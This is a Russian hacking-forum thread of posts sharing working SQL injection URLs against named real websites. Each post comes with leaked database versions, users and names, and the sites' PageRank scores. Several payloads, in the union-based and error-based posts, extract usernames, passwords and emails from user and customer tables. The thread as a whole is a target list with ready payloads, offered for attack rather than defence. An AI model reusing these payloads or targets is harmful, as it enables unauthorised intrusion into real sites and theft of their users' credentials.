SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    обзор международных социальных вопросов

    www.risq.org

    http://www.risq.org/modules.php?name=News&file=print&sid=-367+union+select+1,2,3,4,5,6,7


    version() : 5.0.51a-24+lenny4

    OS : debian-linux-gnu

    PR-5

    mq=off
     
    _________________________
    1 person likes this.
  2. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    http://cfp.ist.utl.pt/golp/People/pass.php?id=-1+union+select+1,concat_ws(version(),database(),user(),@@version_compile_os),3,4--

    db_golp_server
    4.0.24
    [email protected]
    apple-darwin 7.0 1
     
  3. gars0n

    gars0n Elder - Старейшина

    Joined:
    9 Dec 2009
    Messages:
    483
    Likes Received:
    104
    Reputations:
    65
    Code:
    http://www.positivenet.ru/page.php?pg=9+and+1=0+union+select+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5,6,7,8,9,10--
    version: 5.0.90-log
    user: [email protected]
    database: u55780
    Code:
    http://www.mr-logistic.ru/index.php?pg=-4+union+select+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database())--
    version: 5.0.77-log
    user: mrlogis1_1@localhost
    database: mrlogis1_1
    Code:
    http://www.horrorworld.ru/read.php?pg=3&id_author_text=-725+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
    version: 4.1.25-log
    user: horrorw0_mor@localhost
    database: horrorw0_virtgurn
    Code:
    http://travelonline.ru/act.php?pg=shop_razdel&cat=1767+and+1=0+UNION+SELECT+unhex(hex(version()))--
    version: 5.0.67-log
    user: travelonlineru
    database: [email protected]
    Code:
    http://www.pdphoto.org/PictureDetail.php?mat=&pg=-5237+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12,13,14,15--
    version: 4.0.27-standard
    user: dbo117553747@localhost
    database: db117553747
    Code:
    http://www.petropanel.ru/page.php?pg=12+and+1=0+union+select+concat(version(),0x3a,user(),0x3a,database())--
    version: 4.1.25-log
    user: 00092144@localhost
    database: db00092144
    Code:
    http://www.via-sport.ru/index.php?pg=-56+union+select+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database())--
    version: 5.0.37-standard
    user: viasport_1@localhost
    database: viasport_1
    Code:
    http://www.c2clive.com/latestexamcalender.php?id=202+and+1=0+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9--
    version: 5.0.91-log
    user: [email protected]
    database: c2clive
    Code:
    http://www.phas.ru/products.php?id=-19+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database())--
    version: 4.1.22-standard-log
    user: phasru_ayrat@localhost
    database: phasru_products
    Code:
    http://germanfirms.ru/products.php?id=-63+union+select+concat(version(),0x3a,user(),0x3a,database())--
    version: 4.1.22-log
    user: db156426_4@local2
    database: db156426_4
    Code:
    http://isvet.ru/products.php?id=15+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,concat(version(),0x3a,user(),0x3a,database())--
    version: 5.0.51a-24+lenny3-log
    user: [email protected]
    database: z34890_isvet
    Code:
    http://ural-m.perm.ru/products.php?id=8+and+1=0+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5--
    version: 5.0.45-log
    user: ural@localhost
    database: ural
    Code:
    http://mmpris.ru/products.php?rid=2&id=-5+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3--&page=3
    version: 4.1.21-community-max-nt-log
    user: [email protected]
    database: 1gb_mmpris
    Code:
    http://www.cbwgaming.com/index.php?pg=games&action=view&id=-37+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11,12--
    version: 5.0.90-community-log
    user: cbwtest_newuser@localhost
    database: cbwtest_cbwvideo
    Code:
    http://www.wwf.org.ph/newsfacts.php?pg=det&id=-110+union+select+concat(version(),0x3a,user(),0x3a,database())--
    version: 5.1.47
    user: wwforgph_wwfdbu@localhost
    database: wwforgph_wwf
    Code:
    http://www.mybajaguide.com/eng/detail-news.php?news=-125+union+select+1,2,3,4,concat(version(),0x3a,user(),0x3a,database()),6,7,8,9,10,11,12,13--
    version: 4.1.25-Debian_mt1-log
    user: [email protected]
    database: db9596_my
     
    2 people like this.
  4. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://www.santeh-stil.ru/archive_news.php?id=-48+union+select+concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),2+--
    version : 5.0.90-community
    user : santehst_santeh@localhost
    database : santehst_santehst
    os : pc-linux-gnu

    Code:
    http://www.santeh-stil.ru/archive_news.php?id=-48+union+select+concat_ws(0x3a,log,pas,email,fio),2+from+customer--
     
  5. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Code:
    https://golpssl.ist.utl.pt/golpuserdata/pass.php?id=-2+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4--
    5.0.51a-24+lenny3
    db_golp_server
    golp_webpage@localhost
     
  6. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Code:
    http://mir.k156.ru/catviefot3.php?foto_id=-21+union+select+1,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),6,7+--
    version : 5.0.32-Debian_7etch12-log
    user : [email protected]
    database : kostroma_cosf
    os : pc-linux-gnu
     
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.nigfilmcorp.com/content.php?id=39+union+select+1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5

    PR-5
     
    _________________________
  8. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    PR- 3
    version() : 5.0.90-community

    http://www.biochemistry-imm.org/article.php?sid=-13+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+phpauthent_users
    user() : biochemi_site@localhost
    ОС : pc-linux-gnu
     
    #12328 -PRIVAT-, 18 Jun 2010
    Last edited: 18 Jun 2010
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.singaporeartmuseum.sg/exhibitions/details.php?id=-48+/*!UnIoN+SeLeCt*/+1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13

    PR-5

    ----------------
    http://www.diagnosisp.com/dp/journals/journal.php?journal_id=-1'+or(1,1)=(select+count(0),concat((select+concat(email_address,char(58),password)+from+dp_users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

    PR-5
    ---------------
    http://www.law.cf.ac.uk/research/themes/theme.php?id=-8+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,user(),version(),database(),@@version_compile_os)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

    PR-6
    -------------
    http://www.restaurant.bg/en/search_results_en.php?city_id=-224+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,user(),version(),database(),@@version_compile_os)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

    PR-4
     
    _________________________
    #12329 Konqi, 18 Jun 2010
    Last edited: 18 Jun 2010
  10. rbul

    rbul Member

    Joined:
    19 May 2010
    Messages:
    10
    Likes Received:
    8
    Reputations:
    1
    PR 5


    Code:
    http://jobs.nation.co.ke/details.php?id=-2044+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat%28Username,0x3a,Password%29,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+users%20--
    version : 5.0.45
    user : job@localhost
    database: job
     
    #12330 rbul, 18 Jun 2010
    Last edited: 18 Jun 2010
    1 person likes this.
  11. life_glider

    life_glider Member

    Joined:
    13 Apr 2010
    Messages:
    42
    Likes Received:
    25
    Reputations:
    33
    http://www.jrm-group.com/view_news.php?news_id=-1%20union%20select%201,2,concat_ws%280x3c62723e,version%28%29,database%28%29,group_concat%28table_name,0x3c62723e%29%29,4,5,6,7%20from%20information_schema.tables%20where%20table_rows--
    Code:
    PR 3
    5.0.77
    admin5466@localhost
    jrm-group_com_jrm
    brands
    ,categories
    ,customers
    ,news
    ,news_images
    ,order_items
    ,orders
    ,pages
    ,product_options
    ,products
    http://www.facorsteel.com/news.php?news_id=-1%20union%20select%201,concat_ws%280x3a,version%28%29,user%28%29%29,3,4,5,6,7,8
     
    #12331 life_glider, 19 Jun 2010
    Last edited: 19 Jun 2010
  12. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    PR 5
    ТИЦ 10

    version() - 5.0.45
    user() - thewitne_admin@localhost
    database() - thewitne_db
    @@version_compile_os - unknown-linux-gnu

    Дальше как-то сами...
     
    #12332 -PRIVAT-, 19 Jun 2010
    Last edited: 19 Jun 2010
  13. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    version: 5.0.56-lk-log
    Version:5.0.77
     
    #12333 Ctacok, 19 Jun 2010
    Last edited: 19 Jun 2010
    4 people like this.
  14. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=24+and+substring%28version%28%29,1,1%29=4+--+&Itemid=144&page=6
    Blind, 4-ая ветка.
     
    1 person likes this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.downtowngr.org/biz.php?maincategory_id=4+and+substring(version(),1,1)=5--

    PR-4

    ----

    http://www.brusa.biz/news/news.php?l_sel=2&idm=4&idk=-9+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,user(),version(),database(),@@version_compile_os)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

    PR-4
     
    _________________________
    #12335 Konqi, 19 Jun 2010
    Last edited: 19 Jun 2010
  16. Greaves

    Greaves Banned

    Joined:
    7 Apr 2007
    Messages:
    40
    Likes Received:
    21
    Reputations:
    0
    Sql Вм- обменика с полями в угадайку нужно будет поиграть.

    Code:
    http://wm-change.com
    /?buy&id=57%20and%201=2%20unIon%20seLect%20111,222,333,444,555,666,777/
     
    #12336 Greaves, 19 Jun 2010
    Last edited: 19 Jun 2010
    1 person likes this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.proteinkinase.biz/page.php?modul=GoShopping&op=show_article&aid=912&cid=-74'+or(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)--+

    PR-4

    -----

    http://www.mmpbooks.biz/mmp/photo_reps.php?photo_rep_id=-17+union+select+1,group_concat(user_name,char(58),password),3,4,5+from+cms_users

    PR-3

    ------
    http://www.acube-systems.biz/index.php?page=news&id=-68+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5

    PR-5
     
    _________________________
    #12337 Konqi, 19 Jun 2010
    Last edited: 19 Jun 2010
    1 person likes this.
  18. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Code:
    http://psiyoga.ru/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,1,2,3,4+--+
    User: [email protected]
    Version: 5.0.70-log
    Database: gb_x_psiyoga
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://skazki.org.ru/view.php?id=-7468+union+select+1,concat_ws(char(58),user(),version(),database(),@@version_compile_os),3,4,5,6

    PR-4

    тИЦ-120

    /*мой первый сайт из Рунета*/
     
    _________________________
    2 people like this.
  20. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Code:
    http://collegian.kenyon.[COLOR=Red]edu[/COLOR]/issue.php?issue_no=-1'+union+select+1,2,user(),4--+
    user:[email protected]
    version:5.0.77
    pr:5
     
    #12340 Dare, 20 Jun 2010
    Last edited: 20 Jun 2010
    1 person likes this.
Thread Status:
Not open for further replies.